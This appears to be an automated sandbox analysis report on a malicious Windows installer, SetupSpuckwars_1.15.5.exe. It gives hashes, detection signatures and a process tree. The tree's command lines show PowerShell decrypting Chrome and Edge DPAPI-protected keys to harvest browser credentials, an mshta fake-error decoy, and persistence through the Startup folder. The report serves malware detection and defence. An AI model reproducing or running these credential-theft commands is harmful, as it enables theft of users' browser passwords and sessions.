Edit tour
Windows
Analysis Report
SetupSpuckwars_1.15.5.exe
Overview
General Information
| Sample name: | SetupSpuckwars_1.15.5.exe |
| Analysis ID: | 1423647 |
| MD5: | 320696b6328d7d82817da50697fcb673 |
| SHA1: | 9cae6fdf42dda5ecc2c3a84c24488c132dc2f11c |
| SHA256: | 3b83e25ec4dec28c78cf89ae94e007e1928f09a3618b3b653f960d07c9e485b2 |
| Tags: | exe |
| Infos: |  |
 | |
Detection
| Score: | 52 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
SetupSpuckwars_1.15.5.exe (PID: 6684 cmdline: "C:\Users\ user\Deskt op\SetupSp uckwars_1. 15.5.exe" MD5: 320696B6328D7D82817DA50697FCB673) 
spuckwars.exe (PID: 5856 cmdline: C:\Users\u ser\AppDat a\Local\Te mp\2ejji11 5JyJwonCMe C4t6jNhr8O \spuckwars .exe MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) 
cmd.exe (PID: 2232 cmdline: C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 3084 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - spuckwars.exe (PID: 2124 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=gpu-pr ocess --us er-data-di r="C:\User s\user\App Data\Roami ng\spuckwa rs" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AQAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=16 24 --field -trial-han dle=1692,i ,907803359 7839116286 ,178838780 9331467718 8,131072 - -disable-f eatures=Sp areRendere rForSitePe rProcess,W inRetrieve Suggestion sOnlyOnDem and /prefe tch:2 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) - spuckwars.exe (PID: 340 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\2ejji1 15JyJwonCM eC4t6jNhr8 O\spuckwar s.exe" --t ype=utilit y --utilit y-sub-type =network.m ojom.Netwo rkService --lang=en- GB --servi ce-sandbox -type=none --user-da ta-dir="C: \Users\use r\AppData\ Roaming\sp uckwars" - -mojo-plat form-chann el-handle= 2024 --fie ld-trial-h andle=1692 ,i,9078033 5978391162 86,1788387 8093314677 188,131072 --disable -features= SpareRende rerForSite PerProcess ,WinRetrie veSuggesti onsOnlyOnD emand /pre fetch:8 MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2) - cmd.exe (PID: 3288 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7084 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6532 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,2 8,0,0,0,71 ,0,111,0,1 11,0,103,0 ,108,0,101 ,0,32,0,67 ,0,104,0,1 14,0,111,0 ,109,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,162,2 23,64,66,6 7,235,252, 176,134,0, 234,34,88, 190,96,79, 120,163,57 ,223,70,18 4,59,55,25 1,103,80,6 6,213,41,7 9,203,0,0, 0,0,14,128 ,0,0,0,2,0 ,0,32,0,0, 0,65,3,137 ,251,132,6 7,165,117, 37,32,77,1 56,77,25,1 14,22,240, 181,235,10 3,91,102,1 17,255,144 ,36,92,249 ,151,253,6 0,75,48,0, 0,0,43,225 ,223,217,1 51,30,78,1 84,8,140,2 33,239,111 ,191,100,2 51,188,228 ,105,81,24 5,79,114,2 15,91,96,1 12,252,70, 126,43,40, 253,217,12 3,23,241,1 00,8,207,1 53,67,107, 184,161,11 3,210,62,6 4,0,0,0,16 ,48,146,16 ,208,228,7 6,223,250, 118,61,199 ,169,142,1 8,65,154,3 0,229,124, 35,149,206 ,81,42,123 ,202,212,1 01,122,75, 162,189,11 3,249,192, 143,80,146 ,46,12,170 ,101,4,63, 156,140,20 1,97,222,2 42,144,253 ,193,232,1 62,242,114 ,34,110,10 2,135,201, 250), $nul l, 'Curren tUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 6192 cmdline: powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,28,0,0,0, 71,0,111,0 ,111,0,103 ,0,108,0,1 01,0,32,0, 67,0,104,0 ,114,0,111 ,0,109,0,1 01,0,0,0,1 6,102,0,0, 0,1,0,0,32 ,0,0,0,162 ,223,64,66 ,67,235,25 2,176,134, 0,234,34,8 8,190,96,7 9,120,163, 57,223,70, 184,59,55, 251,103,80 ,66,213,41 ,79,203,0, 0,0,0,14,1 28,0,0,0,2 ,0,0,32,0, 0,0,65,3,1 37,251,132 ,67,165,11 7,37,32,77 ,156,77,25 ,114,22,24 0,181,235, 103,91,102 ,117,255,1 44,36,92,2 49,151,253 ,60,75,48, 0,0,0,43,2 25,223,217 ,151,30,78 ,184,8,140 ,233,239,1 11,191,100 ,251,188,2 28,105,81, 245,79,114 ,215,91,96 ,112,252,7 0,126,43,4 0,253,217, 123,23,241 ,100,8,207 ,153,67,10 7,184,161, 113,210,62 ,64,0,0,0, 16,48,146, 16,208,228 ,76,223,25 0,118,61,1 99,169,142 ,18,65,154 ,30,229,12 4,35,149,2 06,81,42,1 23,202,212 ,101,122,7 5,162,189, 113,249,19 2,143,80,1 46,46,12,1 70,101,4,6 3,156,140, 201,97,222 ,242,144,2 53,193,232 ,162,242,1 14,34,110, 102,135,20 1,250), $n ull, 'Curr entUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7204 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,236,112, 27,63,29,4 5,147,76,1 54,28,167, 163,109,16 6,140,139, 16,0,0,0,1 0,0,0,0,69 ,0,100,0,1 03,0,101,0 ,0,0,16,10 2,0,0,0,1, 0,0,32,0,0 ,0,177,111 ,46,150,21 2,157,15,4 ,228,252,1 2,0,1,183, 251,108,66 ,54,253,18 9,23,124,8 6,207,222, 56,201,250 ,182,152,2 21,247,0,0 ,0,0,14,12 8,0,0,0,2, 0,0,32,0,0 ,0,178,13, 225,93,214 ,215,151,1 62,72,143, 194,133,19 0,22,214,1 49,170,149 ,74,147,55 ,106,15,18 0,131,73,1 96,197,128 ,118,103,8 9,48,0,0,0 ,94,206,24 2,8,29,35, 27,71,101, 58,135,55, 188,69,108 ,246,46,23 2,119,93,6 5,217,99,7 ,252,165,3 3,164,119, 40,187,209 ,190,181,2 21,12,22,1 10,211,109 ,137,129,9 8,159,150, 234,140,24 4,64,0,0,0 ,160,185,2 10,147,25, 143,46,73, 184,87,79, 38,71,228, 189,220,24 9,51,245,1 32,106,162 ,213,227,4 5,47,24,17 1,45,48,70 ,50,96,105 ,2,105,84, 9,7,23,200 ,91,89,93, 224,1,154, 41,99,254, 68,168,144 ,46,197,12 6,233,182, 158,66,11, 216,163,15 7), $null, 'CurrentU ser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7252 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,236,11 2,27,63,29 ,45,147,76 ,154,28,16 7,163,109, 166,140,13 9,16,0,0,0 ,10,0,0,0, 69,0,100,0 ,103,0,101 ,0,0,0,16, 102,0,0,0, 1,0,0,32,0 ,0,0,177,1 11,46,150, 212,157,15 ,4,228,252 ,12,0,1,18 3,251,108, 66,54,253, 189,23,124 ,86,207,22 2,56,201,2 50,182,152 ,221,247,0 ,0,0,0,14, 128,0,0,0, 2,0,0,32,0 ,0,0,178,1 3,225,93,2 14,215,151 ,162,72,14 3,194,133, 190,22,214 ,149,170,1 49,74,147, 55,106,15, 180,131,73 ,196,197,1 28,118,103 ,89,48,0,0 ,0,94,206, 242,8,29,3 5,27,71,10 1,58,135,5 5,188,69,1 08,246,46, 232,119,93 ,65,217,99 ,7,252,165 ,33,164,11 9,40,187,2 09,190,181 ,221,12,22 ,110,211,1 09,137,129 ,98,159,15 0,234,140, 244,64,0,0 ,0,160,185 ,210,147,2 5,143,46,7 3,184,87,7 9,38,71,22 8,189,220, 249,51,245 ,132,106,1 62,213,227 ,45,47,24, 171,45,48, 70,50,96,1 05,2,105,8 4,9,7,23,2 00,91,89,9 3,224,1,15 4,41,99,25 4,68,168,1 44,46,197, 126,233,18 2,158,66,1 1,216,163, 157), $nul l, 'Curren tUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7400 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "st art /B cmd /c mshta "javascrip t:new Acti veXObject( 'WScript.S hell').Pop up('An err or occurre d while do wnloading files. Ple ase try ag ain later. ', 0, 'Err or', 16);c lose()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7440 cmdline:
cmd /c msh ta "javasc ript:new A ctiveXObje ct('WScrip t.Shell'). Popup('An error occu rred while downloadi ng files. Please try again lat er.', 0, ' Error', 16 );close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
mshta.exe (PID: 7456 cmdline: mshta "jav ascript:ne w ActiveXO bject('WSc ript.Shell ').Popup(' An error o ccurred wh ile downlo ading file s. Please try again later.', 0 , 'Error', 16);close ()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- spuckwars.exe (PID: 7612 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\spu ckwars.exe " MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||